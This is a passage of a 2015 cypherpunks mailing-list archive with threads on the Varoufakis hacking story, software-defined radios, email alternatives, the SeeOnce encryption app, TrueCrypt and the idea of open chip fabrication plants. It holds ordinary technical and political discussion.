XHnvjkoTGeZ20YOKBickkSIpSQSikEnUzW4eNKR2bLQ9aCE9wz/dEZ8JZ3e0iDcy e6KoTdOxAD4SEBUMUZvFZM3pw7zsMLVAXJiN+LLlZeUG6DwVAuaOrAwix/UOTI1b Zw70CKER+VjzgkaMvT5yTp2fWJdBMtT5eN1Un3Fe9Us4e3FhwZ3HYqZGsDUIgirb bGEjLJ7cTes6thqhb5/O =y/+r -----END PGP SIGNATURE----- From carimachet at gmail.com Mon Jul 27 16:49:01 2015 From: carimachet at gmail.com (Cari Machet) Date: Tue, 28 Jul 2015 02:49:01 +0300 Subject: Varoufakis ridicules GR taxation hacking story In-Reply-To: References: <20150727103431.GA2558@sivokote.iziade.m$> Message-ID: http://t.co/9JTWNyq8JK He made a statement on his blog but i cant fucking get on there to read it because the browser says connecting for 20 minutes now On Jul 27, 2015 5:39 PM, "Cari Machet" wrote: > taking a little poll its sort of interrelated > > why do people think that the fbi conducted > thru jeremy hammond > hacks > of other governments stuff > > for instance the universities, hospitals, oil companies that are state run > > On Mon, Jul 27, 2015 at 2:13 PM, John Young wrote: > >> twitter.com/yanisvaroufakis/status/625336067831558144 >> >> >> > > > -- > Cari Machet > NYC 646-436-7795 > carimachet at gmail.com > AIM carismachet > Syria +963-099 277 3243 > Amman +962 077 636 9407 > Berlin +49 152 11779219 > Reykjavik +354 894 8650 > Twitter: @carimachet > > 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 > > Ruh-roh, this is now necessary: This email is intended only for the > addressee(s) and may contain confidential information. If you are not the > intended recipient, you are hereby notified that any use of this > information, dissemination, distribution, or copying of this email without > permission is strictly prohibited. > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2627 bytes Desc: not available URL: From l at odewijk.nl Mon Jul 27 10:59:32 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Tue, 28 Jul 2015 02:59:32 +0900 Subject: How do cookies on Twitter give me "safer experience"? In-Reply-To: <55B66E5B.7000902@riseup.net> References: <20150727143624.GC2558@sivokote.iziade.m$> <55B66E5B.7000902@riseup.net> Message-ID: How is it faster to send a cookie with every request? ;) Perhaps it's just "personalize" ergo Twitter earns more ergo everything gets better. Perhaps don't look into copywriter ramblings. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 277 bytes Desc: not available URL: From carimachet at gmail.com Mon Jul 27 20:09:28 2015 From: carimachet at gmail.com (Cari Machet) Date: Tue, 28 Jul 2015 06:09:28 +0300 Subject: Varoufakis ridicules GR taxation hacking story In-Reply-To: References: <20150727103431.GA2558@sivokote.iziade.m$> Message-ID: http://www.nytimes.com/2015/07/28/business/greece-debt-varoufakis-recording.html?rref=business&module=Ribbon&version=context®ion=Header&action=click&contentCollection=Business%20Day&pgtype=article new york times now On Tue, Jul 28, 2015 at 2:49 AM, Cari Machet wrote: > http://t.co/9JTWNyq8JK > > He made a statement on his blog but i cant fucking get on there to read it > because the browser says connecting for 20 minutes now > On Jul 27, 2015 5:39 PM, "Cari Machet" wrote: > >> taking a little poll its sort of interrelated >> >> why do people think that the fbi conducted > thru jeremy hammond > hacks >> of other governments stuff >> >> for instance the universities, hospitals, oil companies that are state run >> >> On Mon, Jul 27, 2015 at 2:13 PM, John Young wrote: >> >>> twitter.com/yanisvaroufakis/status/625336067831558144 >>> >>> >>> >> >> >> -- >> Cari Machet >> NYC 646-436-7795 >> carimachet at gmail.com >> AIM carismachet >> Syria +963-099 277 3243 >> Amman +962 077 636 9407 >> Berlin +49 152 11779219 >> Reykjavik +354 894 8650 >> Twitter: @carimachet >> >> 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 >> >> Ruh-roh, this is now necessary: This email is intended only for the >> addressee(s) and may contain confidential information. If you are not the >> intended recipient, you are hereby notified that any use of this >> information, dissemination, distribution, or copying of this email >> without >> permission is strictly prohibited. >> >> >> -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4239 bytes Desc: not available URL: From jdb10987 at yahoo.com Mon Jul 27 23:11:20 2015 From: jdb10987 at yahoo.com (jim bell) Date: Tue, 28 Jul 2015 06:11:20 +0000 (UTC) Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway) In-Reply-To: <2037801709.3450009.1438011077656.JavaMail.yahoo@mail.yahoo.com> References: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz> <2037801709.3450009.1438011077656.JavaMail.yahoo@mail.yahoo.com> Message-ID: <493879029.4406688.1438063880373.JavaMail.yahoo@mail.yahoo.com> From: jim bell From: Peter Gutmann wirelesswarrior at Safe-mail.net writes: >>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000, .>>that not long ago were in the $10,000s. The HackRF (which some have >>complained is little more than an IF strip) effectively covering down to >>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is >>not in the same league as the 16-bit USRPs). If some hardware hacker were to >>deliver a 14-16 bit ADC daughter board (there are afforadble chips offering >>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it >>could substantially improve its use. >The problem with the HackRF (and other USB-based devices) is the bandwidth of >the USB connection, it's not that the HackRF hardware can't handle it, it's >that you can't get that much data to the PC. >(I have a HackRF - I needed a cheap way to track down some odd RFI issues - >and it's a pretty cool piece of hardware for the money, but, as I mentioned >earlier, you do get what you're paying for.  If I could make a wishlist, it'd >be nice to have a rev.2 with some work done on the front- end...). Do you know anything about this model:   http://www.triarchytech.com/index.html   4, 6, 8, and 12 GHz units.           Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5619 bytes Desc: not available URL: From juan.g71 at gmail.com Tue Jul 28 02:16:16 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 28 Jul 2015 06:16:16 -0300 Subject: another google nugget Message-ID: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> Yep. I've forgotten about this one. Just the thing for all the list's neocunts. https://en.wikipedia.org/wiki/Boston_Dynamics "don't be evil" From sswalow at gmail.com Tue Jul 28 05:01:00 2015 From: sswalow at gmail.com (swalow swalow) Date: Tue, 28 Jul 2015 08:01:00 -0400 Subject: another google nugget In-Reply-To: <20150728110953.GA2524@sivokote.iziade.m$> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> Message-ID: Beginner question: What are the alternatives? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 67 bytes Desc: not available URL: From skquinn at rushpost.com Tue Jul 28 07:43:52 2015 From: skquinn at rushpost.com (Shawn K. Quinn) Date: Tue, 28 Jul 2015 09:43:52 -0500 Subject: another google nugget In-Reply-To: References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> Message-ID: <1438094632.21834.1.camel@moonpatrol> On Tue, 2015-07-28 at 08:01 -0400, swalow swalow wrote: > Beginner question: > What are the alternatives? Fastmail, for one, though it does cost. I would imagine riseup.net is also an option for some. > -- Shawn K. Quinn From wirelesswarrior at safe-mail.net Tue Jul 28 07:37:25 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Tue, 28 Jul 2015 10:37:25 -0400 Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway) Message-ID: Jim, Only what I have read. The reviews by professionals have been very favorable given its price though not in the same league as pro equipment. Some use it often to take into the field while leaving their expensive gear safe on the bench. The software is also well reviewed though closed source, AFAIK. WW -------- Original Message -------- From: jim bell To: Peter Gutmann , "wirelesswarrior at Safe-mail.net" Cc: "cypherpunks at cpunks.org" Subject: Re: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway) Date: Tue, 28 Jul 2015 06:11:20 +0000 (UTC) > > > From: jim bell > From: Peter Gutmann > > > > wirelesswarrior at Safe-mail.net writes: > > > > >>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000, > .>>that not long ago were in the $10,000s. The HackRF (which some have > >>complained is little more than an IF strip) effectively covering down to > >>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is > >>not in the same league as the 16-bit USRPs). If some hardware hacker were to > >>deliver a 14-16 bit ADC daughter board (there are afforadble chips offering > >>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it > >>could substantially improve its use. > > >The problem with the HackRF (and other USB-based devices) is the bandwidth of > >the USB connection, it's not that the HackRF hardware can't handle it, it's > >that you can't get that much data to the PC. > > >(I have a HackRF - I needed a cheap way to track down some odd RFI issues - > >and it's a pretty cool piece of hardware for the money, but, as I mentioned > >earlier, you do get what you're paying for. If I could make a wishlist, it'd > >be nice to have a rev.2 with some work done on the front- end...). > > Do you know anything about this model: http://www.triarchytech.com/index.html 4, 6, 8, and 12 GHz units. > > Jim Bell > > > > > > > > > > > > > > > > > > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 6662 bytes Desc: not available URL: From loki at obscura.com Tue Jul 28 11:03:26 2015 From: loki at obscura.com (Lance Cottrell) Date: Tue, 28 Jul 2015 11:03:26 -0700 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: <55B6C606.6090106@pilobilus.net> References: <55B6C606.6090106@pilobilus.net> Message-ID: <5E1BAF7F-CE32-41F8-9592-4A0E969734F2@obscura.com> Interesting. I wonder if they have had abuse issues from Tor. I know that the credit card fraud rate from Tor IP addresses is fierce, it is on par with countries like Nigeria, but this is not a merchant. -Lance -- Lance Cottrell loki at obscura.com > On Jul 27, 2015, at 5:00 PM, Steve Kinney wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On 07/27/2015 11:21 AM, wirelesswarrior at safe-mail.net wrote: >> Probably the result of DDoS and other exploit attacks against >> the site. >> >>> On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta >>> wrote: >>>> The server at www.wirelessvillage.ninja sez: "Chances are, >>>> if you got this page, that means the server doesn't like >>>> something about you. You may be using an invalid HTTP >>>> option, or an evil browser string, or maybe just from a >>>> country we are leery of." >>> >>> same from some random tor exitnode. the ops seem to hate >>> freedom or at least anon visitors > > They seem to be subscribed to some list of TOR exit nodes and > filter against that. I tried connecting via 3 nodes, 2 worked > normally and one returned the polite FU notice. > > :o) > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1 > > iQIcBAEBAgAGBQJVtsYCAAoJEDZ0Gg87KR0LYCgP/2cS3uDKHIebOC2qsLaGdUro > 3tr3xX9JjMesYQf9KbQMX3l/ST0dMqRf8TO5TwRnps3h+nkxyLDfMid6M4sxKixU > DF3cBpsPS2riopnLmIU3C+060YIUhMys45nyhdQ56rsum7kKVScSuWEiBbKus6uu > ihly5CeBN0F9Hodag1JbpXN/5N+fF4ypnI/YzXXuVHKjglkTuGAQLSiOJZTVarEA > p9N24LDAiZbln1IEXyEH/wV/OIVbyBmk3TIvT6QY//ej5tCS7V2KXUNbVNsHLKtp > yKqdHxsshbKembgA5Ucv2tnw6mc2a5wfnXhozXI1f5cQeULBCyxOiVA/8z9iLCbH > sfklmYyMArYTjCNEFMVTpnHlPZi2jCzOX8QXSojJoq+Up2L2zkh6oL2OT+p1sXB3 > Fm1l5yHNf6DrcWTY9dPrWi+xB0tHQ3eWNZHN6HDeXMCy4vBvf3PrJgCK9pl4tWyK > XHnvjkoTGeZ20YOKBickkSIpSQSikEnUzW4eNKR2bLQ9aCE9wz/dEZ8JZ3e0iDcy > e6KoTdOxAD4SEBUMUZvFZM3pw7zsMLVAXJiN+LLlZeUG6DwVAuaOrAwix/UOTI1b > Zw70CKER+VjzgkaMvT5yTp2fWJdBMtT5eN1Un3Fe9Us4e3FhwZ3HYqZGsDUIgirb > bGEjLJ7cTes6thqhb5/O > =y/+r > -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4426 bytes Desc: not available URL: From bbrewer at littledystopia.net Tue Jul 28 08:21:11 2015 From: bbrewer at littledystopia.net (bbrewer) Date: Tue, 28 Jul 2015 11:21:11 -0400 Subject: another google nugget In-Reply-To: <20150728144734.GM6906@ctrlc.hu> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> <20150728144734.GM6906@ctrlc.hu> Message-ID: > On Jul 28, 2015, at 10:47 AM, stef wrote: > > is this mailinglist suddenly transformed to the libtech list? cypherpunks i > believe build their own infrastructure, they work on remailers, and other > related stuff. what the hell happened? can someone foia what the codeword for > operation "disrupt cypherpunks mailinglist" is? > > the mind boggles. I wanted to hit the ‘like’ button on this, but I couldn’t find it. My internet must be broken. (I will agree hosting your own could be the way to go, however, running/admining your own box at home / work or hosted on a VPS each carry with them their own dangers of security, trust, yadda yadda). There is, as you state, a large difference between acknowledging these other options and their upsides/downsides, vs. simply not acknowledging their existence at all. Depressing. From tim at diffalt.com Tue Jul 28 08:57:23 2015 From: tim at diffalt.com (Tim Beelen) Date: Tue, 28 Jul 2015 11:57:23 -0400 Subject: another google nugget In-Reply-To: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> Message-ID: <55B7A663.5000704@diffalt.com> i like wobble bots. *wobble* *wobble* so cute. On 7/28/2015 5:16 AM, Juan wrote: > > Yep. I've forgotten about this one. > > Just the thing for all the list's neocunts. > > https://en.wikipedia.org/wiki/Boston_Dynamics > > "don't be evil" > > > From Rayzer at riseup.net Tue Jul 28 13:13:03 2015 From: Rayzer at riseup.net (Razer) Date: Tue, 28 Jul 2015 13:13:03 -0700 Subject: Fwd: [liberationtech] Introducing SeeOnce In-Reply-To: References: Message-ID: <55B7E24F.6080805@riseup.net> -------- Forwarded Message -------- Subject: Introducing SeeOnce Date: Mon, 27 Jul 2015 17:40:55 -0500 From: Francisco Ruiz Reply-To: liberationtech To: liberationtech Newsgroups: gmane.technology.liberationtech Hello LiberationTech subscribers, SeeOnce is a new web app that encrypts text and files with forward secrecy. This is achieved by changing keys with every message rather than using a server to store keys or encrypted material. SeeOnce consists of a single, relatively small html document, which doesn't connect to any servers. It is based on a javascript implementation of TweetNaCl, plus WiseHash, a dictionary-based key entropy meter that adds a variable number of scrypt key stretching rounds for weaker keys. Forward secrecy is obtained through a protocol similar to OTR messaging, except that communications are expected to be asynchronous. SeeOnce connects to the browser's default email through conventional mailto and web links, so users don't need to install anything. Removal of ephemeral data can be done via a single button. Another important goal is to make key exchange transparent to the user, so that even complete novices can use it right away. Please take a look at SeeOnce and give us any suggestions you might think appropriate. The preferred way is by starting Issues at the project's GitHub page at: https://github.com/fruiz500/SeeOnce The app is directly downloadable from https://seeonce.net. A Chrome app, able to synchronize its data through Google servers, is available at:Â https://chrome.google.com/webstore/detail/seeonce-privacy/jbcllagadcpaafoeknfklbenimcopnfc Thank you very much. -- Francisco Ruiz Associate Professor MMAE department Illinois Institute of Technology PL22ezLok=gqqjw-pq3eu-sgzpp-j87cn-fh7ik-6kvmn-comx2-b4xfn-gihga-s46e4=PL22ezLok h**ps://www 'dot' youtube 'dot' com/watch?v=UOJXI8E0lKY get the PassLok privacy app at: https://passlok.com -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From guninski at guninski.com Tue Jul 28 04:09:53 2015 From: guninski at guninski.com (Georgi Guninski) Date: Tue, 28 Jul 2015 14:09:53 +0300 Subject: another google nugget In-Reply-To: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> Message-ID: <20150728110953.GA2524@sivokote.iziade.m$> On Tue, Jul 28, 2015 at 06:16:16AM -0300, Juan wrote: > > > Yep. I've forgotten about this one. > > Just the thing for all the list's neocunts. > > https://en.wikipedia.org/wiki/Boston_Dynamics > > "don't be evil" Weird to send this from @gmail account. Are you supporting @gmail? From s at ctrlc.hu Tue Jul 28 05:24:46 2015 From: s at ctrlc.hu (stef) Date: Tue, 28 Jul 2015 14:24:46 +0200 Subject: another google nugget In-Reply-To: References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> Message-ID: <20150728122446.GL6906@ctrlc.hu> On Tue, Jul 28, 2015 at 08:01:00AM -0400, swalow swalow wrote: > Beginner question: > What are the alternatives? hosting your own??? jeez. -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From eugen at leitl.org Tue Jul 28 07:55:56 2015 From: eugen at leitl.org (Eugen Leitl) Date: Tue, 28 Jul 2015 14:55:56 +0000 Subject: the LibGen situation Message-ID: <20150728145556.GG18664@leitl.org> https://www.reddit.com/r/Scholar/comments/3bs1rm/meta_the_libgenscihub_thread_howtos_updates_and/ From list at sysfu.com Tue Jul 28 16:22:42 2015 From: list at sysfu.com (Seth) Date: Tue, 28 Jul 2015 16:22:42 -0700 Subject: True Crypt is Not Secure In-Reply-To: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: On Tue, 28 Jul 2015 15:40:55 -0700, oshwm wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > So is anyone working on building an 'openfab' or is it such a big task > that everyone just backs away in horror? :D My understanding is that the capital costs involved with building and operating a chip fabrication plant are astronomical, although the situation may be getting better. [1] [1] http://spectrum.ieee.org/semiconductors/design/the-new-economics-of-semiconductor-manufacturing From grarpamp at gmail.com Tue Jul 28 13:43:07 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 16:43:07 -0400 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B56493.7020603@pilobilus.net> References: <55B3EBED.5060702@riseup.net> <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com> <55B56493.7020603@pilobilus.net> Message-ID: > Need some volunteers and/or a funding angel to create a corpus of > howto docs that identify the RF receiver parts in automotive ECM > units and their associated wiring harnesses, including which pins > to cut to assure radio silence in both directions. > I'm reading this discussion with some amusement because I wrote off car > ownership and being a 'motorhead' a decade or more ago when the cars > wouldn't let you tune them up correctly b/c 'computer'. > ECM units are fairly well RF isolated, so those that > talk to the world should normally have easily identified > connections to external antennas. > Junk yards pull ECMs and sell them back to their manufacturers Vehicles have intrinsic baseline performance / emissions / operation they are capable of. Computers with sensors are just there to tweak things and tell you when it's broken. You could just as easily watch what those systems are sensing and actuating under various conditions, duplicate the control in your own FPGA/PIC/etc, then rip out the factory system and put in your own. Getting a motor to run or pass EPA isn't that hard... spend some time learn2motorheading on youtube. cpu, rom, flash, io, control, antenna, logging are increasingly being embedded under a single chip epoxy cap. Fewer leads to cut when the only leads left are io to sensors, actuators and power. If antennas become embedded there's always Faraday. Cut the service io ports. Internal logging would still require destruction. Manufacturers don't need used ECM's, the ECM rebuild / repair / replacement aftermarket does. > codermange who love his '67 Chevy C20 long bed farm truck more each day :) Word. If you livin in some place that has EPA checks, newfangled Hyundai's, and more pavement and sewers than pasture and streams... you aint country. From s at ctrlc.hu Tue Jul 28 07:47:34 2015 From: s at ctrlc.hu (stef) Date: Tue, 28 Jul 2015 16:47:34 +0200 Subject: another google nugget In-Reply-To: <1438094632.21834.1.camel@moonpatrol> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> Message-ID: <20150728144734.GM6906@ctrlc.hu> On Tue, Jul 28, 2015 at 09:43:52AM -0500, Shawn K. Quinn wrote: > On Tue, 2015-07-28 at 08:01 -0400, swalow swalow wrote: > > Beginner question: > > What are the alternatives? > > Fastmail, for one, though it does cost. I would imagine riseup.net is > also an option for some. is this mailinglist suddenly transformed to the libtech list? cypherpunks i believe build their own infrastructure, they work on remailers, and other related stuff. what the hell happened? can someone foia what the codeword for operation "disrupt cypherpunks mailinglist" is? the mind boggles. -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From grarpamp at gmail.com Tue Jul 28 14:04:38 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 17:04:38 -0400 Subject: True Crypt is Not Secure In-Reply-To: <1437752365-sup-6750@metis.syd1.tesser.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> Message-ID: > TrueCrypt has been audited[0] and come through relatively unscathed; > I'd trust it over a Microsoft product I'd need to disassemble to > examine any day. You may trust your opensource code but would still need to disassemble and audit any critical and closed windows libs and system interfaces you compile against, let alone run in / under. This is the trouble with closed platforms. You have some luck with open unix, but the luck buck currently stops at the iron and the hardware is getting worse. And we don't have any open fabs on the horizon to solve it. This is BAD. From zen at freedbms.net Tue Jul 28 11:29:30 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 28 Jul 2015 18:29:30 +0000 Subject: another google nugget In-Reply-To: References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> <20150728144734.GM6906@ctrlc.hu> Message-ID: On 7/28/15, bbrewer wrote: >> On Jul 28, 2015, at 10:47 AM, stef wrote: >> is this mailinglist suddenly transformed to the libtech list? cypherpunks >> i >> believe build their own infrastructure, they work on remailers, and other >> related stuff. what the hell happened? can someone foia what the codeword >> for >> operation "disrupt cypherpunks mailinglist" is? >> >> the mind boggles. > > I wanted to hit the ‘like’ button on this, but I couldn’t find it. My > internet must be broken. Sorry I downloaded the Internet the other day - forgot to upload it again. Gimme 5. From grarpamp at gmail.com Tue Jul 28 18:27:44 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 21:27:44 -0400 Subject: Open Fabs Message-ID: On Tue, Jul 28, 2015 at 8:15 PM, jim bell wrote: > From: Seth > On Tue, 28 Jul 2015 15:40:55 -0700, oshwm wrote: >> >>> So is anyone working on building an 'openfab' or is it such a big task >>> that everyone just backs away in horror? :D Of course you're going to fail if you keep saying no and FUDding yourself. Is anyone building "cars" or is it such a big task that... http://www.teslamotors.com/ >>My understanding is that the capital costs involved with building and >>operating a chip fabrication plant are astronomical, although the >>situation may be getting better. > >>http://spectrum.ieee.org/semiconductors/design/the-new-economics-of-semiconductor-manufacturing Competition, so what? Leech what's been done before you. > Even 30 years ago, there were custom fabs that were designed to allow small > organizations to get chips fabbed. This may be one of the modern version of > them: http://www.globalfoundries.com/manufacturing/manufacturing-overview You don't need a $50B 1Msqft setup to start making chips, you need a floor in a warehouse and some people who believe. > In the mid 80's, they typically purchased older fabs (not state of the art) > and allowed small companies to prototype their semiconductor designs. > Today, some of them apparently do near-state-of-the-art production. Universities have always had fabs too. The cost to get a basic line going at some tech level is not prohibitive, it's an adventure. Open is your differentiator and your ROI, even private runs will come paying to you because they know your ground up construction and monitored production process can't inject warez in their silicon. Can you as a reasonably learned hobbyist go observe an Intel run through GloFab from start to finish? What about for the chip inside your phone? Your makerbot? Your RPi? Your USRP? Your own mask? No? Well... that's a problem. From admin at pilobilus.net Tue Jul 28 18:34:07 2015 From: admin at pilobilus.net (Steve Kinney) Date: Tue, 28 Jul 2015 21:34:07 -0400 Subject: True Crypt is Not Secure In-Reply-To: References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: <55B82D8F.3030907@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/28/2015 07:22 PM, Seth wrote: > On Tue, 28 Jul 2015 15:40:55 -0700, oshwm > wrote: > >> So is anyone working on building an 'openfab' or is it such >> a big task that everyone just backs away in horror? :D > > My understanding is that the capital costs involved with > building and operating a chip fabrication plant are > astronomical, although the situation may be getting better. > [1] > > [1] > http://spectrum.ieee.org/semiconductors/design/the-new-economics-o f-semiconductor-manufacturing If > > a market is willing to pay enough to support and grow the project, it can be done. Are there potential partners and large scale consumers for "top security through total transparency" to make an open hardware project viable today? One potential route would be to broker a deal to pool the resources of specialty hardware integrators who already have a market base for high security "solutions." The Open Office project pulled off something similar years ago, obtaining major funding and support from IBM and others who wanted Microsoft out of their hair. So, who wants a shot at defending some of their digital assets from outfits like NSA and GHCQ, badly enough to pay for it? The first place I would start shopping this "crypto anarchist" project around would be State security services - pretty much any small to mid-sized outfit not in BRICS or FVEYE could be a potential market for auditable scrambler phones for military commanders, senior elected officials, diplomatic corps and double-nought spies. From there to high performance servers and workstations would be a natural progression. I haven't looked at how the Black Phone folks are doing lately, but that looks like the kind of product line where open hardware might find its first viable home. Another consideration: One needs not necessarily own the facility where the chips are made: ISO quality assurance programs already in place support client access for audit and validation. A contract that specifies the client's intrusive presence during every phase of production and handling would cost extra, but a QA process that assumes the presence of hostile actors on the shop floor is definitely possible. Such a process would also be needed at a dedicated facility: One must assume the presence of hostile actors there, too. :o) Steve -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVuC2NAAoJEDZ0Gg87KR0LBwoQAIJfgVPARltMa8b/sMMnpe3G IO4aJd65b/24P6zLvngnpb+uy1Lo/7JwbWc2bNY6lbCEEUVRiZHYywSPeRvMf7zu T1WZzZnBVvCMv7m/3rO1J3g+6ImvX0bCvbrn3yi2W14J1K4cBYOFJ9f0yYFH2rPi HTL7Zboraazm4s3isgk5KJq2dIO69eXUartrGoVDuTzeO/L3nKNVCn262b3HdmGe UyFamR25s8sY10y8BLnerRqOlWM2ZDdsKtbycyz73igfUDVlx3t+0KAWNMI59JDc AumjXP+WqNexU0/Cm244hcu6hEEtsexBUAHzdy3l148YPoRbB8ZkZyhyRCCvz48U T2F6eGJMy0ACv5pfOBB4WmRgYGlQzscMPJkGYGOyz1iOhCb1fc+06nDGF8mwsrqp FI8MVumrVr2WE6jW4cX13dQ7x0RRzZzL3tBbPJ0I2c9Nz4MvkDe9pAZHFGQPiMHv Prw+MjWBsmAOIKmKCGKA3b41JY8SX6OXGTarjenyfic1QcmhsyEUkXzhfIGUD0+6 8TDKxamo57NZXNueNkaJdS/zb4sdyfRHR1WzsbQziqB3b/2OYoq6CmIM8mAUZXm1 6jKF5FENIvIx9JOxA4l2tBTZgWzEb5WaNVi0Ok4qs4ilKaYEEnvk2p8eatnZFX56 Jqg+hScNrbW8tVfQWS/9 =hdOW -----END PGP SIGNATURE----- From grarpamp at gmail.com Tue Jul 28 18:55:41 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 21:55:41 -0400 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: References: Message-ID: On Mon, Jul 27, 2015 at 11:21 AM, wrote: > Probably the result of DDoS and other exploit attacks against the site. > >> >> same from some random tor exitnode. the ops seem to hate freedom or at least >> anon visitors >> otr fp: https://www.ctrlc.hu/~stef/otr.txt Because Tor is so very capable of ddos, and hackers are so incapable of securing their own sites. Ops like typical wan interface logwatching handwavers. Want to be random, put your site on the darknets. From grarpamp at gmail.com Tue Jul 28 19:20:41 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 22:20:41 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: > Steve Kinney wrote: > If a market is willing to pay enough to support and grow the > project, it can be done. Are there potential partners and large > scale consumers for "top security through total transparency" to > make an open hardware project viable today? > > One potential route would be to broker a deal to pool the > resources of specialty hardware integrators who already have a > market base for high security "solutions." The Open Office > project pulled off something similar years ago, obtaining major > funding and support from IBM and others who wanted Microsoft out > of their hair. So, who wants a shot at defending some of their > digital assets from outfits like NSA and GHCQ, badly enough to pay > for it? > > The first place I would start shopping this "crypto anarchist" > project around would be State security services - pretty much any > small to mid-sized outfit not in BRICS or FVEYE could be a > potential market for auditable scrambler phones for military > commanders, senior elected officials, diplomatic corps and > double-nought spies. From there to high performance servers and > workstations would be a natural progression. > > I haven't looked at how the Black Phone folks are doing lately, > but that looks like the kind of product line where open hardware > might find its first viable home. > > Another consideration: One needs not necessarily own the facility > where the chips are made: ISO quality assurance programs already > in place support client access for audit and validation. A > contract that specifies the client's intrusive presence during > every phase of production and handling would cost extra, but a QA > process that assumes the presence of hostile actors on the shop > floor is definitely possible. Such a process would also be needed > at a dedicated facility: One must assume the presence of hostile > actors there, too. :o) That's basically all part of the idea. And that some serious multi philosophical combination of hardcore Stallman Ghandi Cpunk Riseup Coder Maker Opensource Auditor like motherfuckers all build, run and observe the joint from the ground up as essentially a crosschecked incorruptible thing that anyone can look at. Todays shops are a mutable system of hierarchical employee paychecks, payoffs, closed door privacy and backroom games. From rysiek at hackerspace.pl Tue Jul 28 14:09:03 2015 From: rysiek at hackerspace.pl (rysiek) Date: Tue, 28 Jul 2015 23:09:03 +0200 Subject: another google nugget In-Reply-To: <20150728122446.GL6906@ctrlc.hu> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728122446.GL6906@ctrlc.hu> Message-ID: <2844904.zZGGaKtjBA@lapuntu> Dnia wtorek, 28 lipca 2015 14:24:46 stef pisze: > On Tue, Jul 28, 2015 at 08:01:00AM -0400, swalow swalow wrote: > > Beginner question: > 